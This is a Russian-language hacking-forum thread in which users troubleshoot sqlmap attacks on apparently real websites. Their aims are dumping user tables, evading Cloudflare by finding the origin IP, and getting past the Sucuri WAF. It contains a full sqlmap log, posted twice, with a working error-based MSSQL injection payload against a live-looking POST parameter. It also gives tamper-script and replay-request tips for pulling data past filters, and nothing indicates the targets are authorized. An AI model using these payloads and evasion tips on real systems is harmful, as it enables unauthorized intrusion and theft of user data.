ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

14.09.2018, 14:10
|
|
Познающий
Регистрация: 09.03.2016
Сообщений: 30
Провел на форуме: 10377
Репутация:
0
|
|
всем привет , возникла ситуация, что таблицы в БД имеют имя #__users , например. При получении колонок или дампе выскакивает, что нет записей в таблице, но такое не может быть , так как на сайте очень много пользователей. Помогите, пожалуйста, это обойти. Инкапсуляция не помогает
|
|
|

14.09.2018, 14:59
|
|
Познающий
Регистрация: 09.03.2016
Сообщений: 30
Провел на форуме: 10377
Репутация:
0
|
|
Сообщение от man474019
↑
try with --hex or --no-cast parameter and play with different tamper scripts
помог отдельно взятый тампер unionalltounion и --hex, причем в связке с другими тамперами он не срабатывал, только как отдельный, список таблиц сразу преобразился, спасибо
|
|
|

19.09.2018, 13:07
|
|
Новичок
Регистрация: 19.09.2018
Сообщений: 3
Провел на форуме: 651
Репутация:
0
|
|
Как обойти cloudflare?
|
|
|

22.09.2018, 18:54
|
|
Познающий
Регистрация: 25.08.2013
Сообщений: 92
Провел на форуме: 35643
Репутация:
3
|
|
Найти реальный ip.
Для начала ознакомься
/threads/458593/
Вопрос не в той теме. Средствами самого sqlmap'a ты не обойдешь, только подставляя валидную сессию и запрос (на которых клауд пропустил при пентесте). Но при долгой работе над сайтом - так себе затея.
|
|
|

22.09.2018, 20:01
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от panic.ker
↑
Найти реальный ip.
Для начала ознакомься
/threads/458593/
Вопрос не в той теме. Средствами самого sqlmap'a ты не обойдешь, только подставляя валидную сессию и запрос (на которых клауд пропустил при пентесте). Но при долгой работе над сайтом - так себе затея.
Можно ещё попробовать нетспаркером
У него есть консоль при раскрутки SQL
Я не пробовал но при скане клауд обходится
|
|
|

22.09.2018, 20:17
|
|
Познающий
Регистрация: 25.08.2013
Сообщений: 92
Провел на форуме: 35643
Репутация:
3
|
|
Сообщение от Sensoft
↑
Можно ещё попробовать нетспаркером
У него есть консоль при раскрутки SQL
Я не пробовал но при скане клауд обходится
НЕ обходится. Просто пропускает, т.к. нетспаркер пропустил, "консоль" использует ту же сессию, куки, заголовки, токены etc которые использовались при скане. При смене любых параметров, которые не пропустит сам клауд, повторном скане и т.д. он вылезет снова. Инструмент в данном случае не важен. Можно просто сохранить в файл запрос и вызвать в мапе через опцию -r /path/to/file
К слову, good news, everyone! (последние сводочки)
CloudFlare отключила CAPTCHA для пользователей Tor. В качестве альтернативы предложено бесплатное решение CloudFlare Onion Service.
|
|
|

30.09.2018, 14:06
|
|
Новичок
Регистрация: 09.06.2018
Сообщений: 11
Провел на форуме: 2069
Репутация:
0
|
|
Всем привет. Нашел иньекцию. Спарсил бд на ура,но неможет найти таблицы,--hex и --no-cast не помогают.Тамперы некоторые тоже. В чем может быть проблема? и что можно сделать?
[*] starting at 13:52:51
[13:52:52] [INFO] resuming back-end DBMS 'microsoft sql server'
[13:52:52] [INFO] testing connection to the target URL
[13:52:54] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[13:53:00] [WARNING] WAF/IPS/IDS product hasn't been identified
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Sponsor (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
(IN)
Payload: PlacementID=&Sponsor=DFGHJK'+(SELECT 'hwlL' WHERE 5397=5397 AND 8
871 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+ (SELECT (CASE W
HEN (8871=8871) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+
CHAR(106)+CHAR(113))))+'
---
[13:53:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[13:53:00] [INFO] fetching tables for database: db_superdb
[13:53:23] [WARNING] the SQL query provided does not return any output
[13:53:23] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[13:53:24] [WARNING] the SQL query provided does not return any output
[13:53:24] [CRITICAL] unable to retrieve the tables for any database
[13:53:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times, 404 (Not Found) - 1 times
[*] shutting down at 13:53:24
C:\sqlmap>
|
|
|

02.10.2018, 19:56
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от qwerty1qwerty
↑
Всем привет. Нашел иньекцию. Спарсил бд на ура,но неможет найти таблицы,--hex и --no-cast не помогают.Тамперы некоторые тоже. В чем может быть проблема? и что можно сделать?[*] starting at 13:52:51
[13:52:52] [INFO] resuming back-end DBMS 'microsoft sql server'
[13:52:52] [INFO] testing connection to the target URL
[13:52:54] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[13:53:00] [WARNING] WAF/IPS/IDS product hasn't been identified
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Sponsor (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
(IN)
Payload: PlacementID=&Sponsor=DFGHJK'+(SELECT 'hwlL' WHERE 5397=5397 AND 8
871 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+ (SELECT (CASE W
HEN (8871=8871) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+
CHAR(106)+CHAR(113))))+'
---
[13:53:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[13:53:00] [INFO] fetching tables for database: db_superdb
[13:53:23] [WARNING] the SQL query provided does not return any output
[13:53:23] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[13:53:24] [WARNING] the SQL query provided does not return any output
[13:53:24] [CRITICAL] unable to retrieve the tables for any database
[13:53:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times, 404 (Not Found) - 1 times[*] shutting down at 13:53:24
C:\sqlmap>
Такая же ***ня
Тоже MsSQL
|
|
|

03.10.2018, 21:32
|
|
Новичок
Регистрация: 29.10.2012
Сообщений: 12
Провел на форуме: 3176
Репутация:
0
|
|
Parameter: GET
Type: boolean-based blind
Таблицы и колонки выходят нормально.
Когда делаю дамп выходит такое
[09:08:55] [INFO] retrieved:
[09:08:57] [INFO] resumed: ?????????????????????
[09:08:59] [INFO] retrieving the length of query output
[09:09:01] [INFO] retrieved:
[09:09:02] [INFO] resumed: ?????????????????????
Нашел, что надо задать кодировку вывода.
Как правильно написать запрос?
|
|
|

04.10.2018, 00:04
|
|
Познающий
Регистрация: 15.08.2015
Сообщений: 83
Провел на форуме: 17650
Репутация:
0
|
|
Подскажите есть ли возможность обойти waf от sucuri.
все способы с гугла опробовал..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|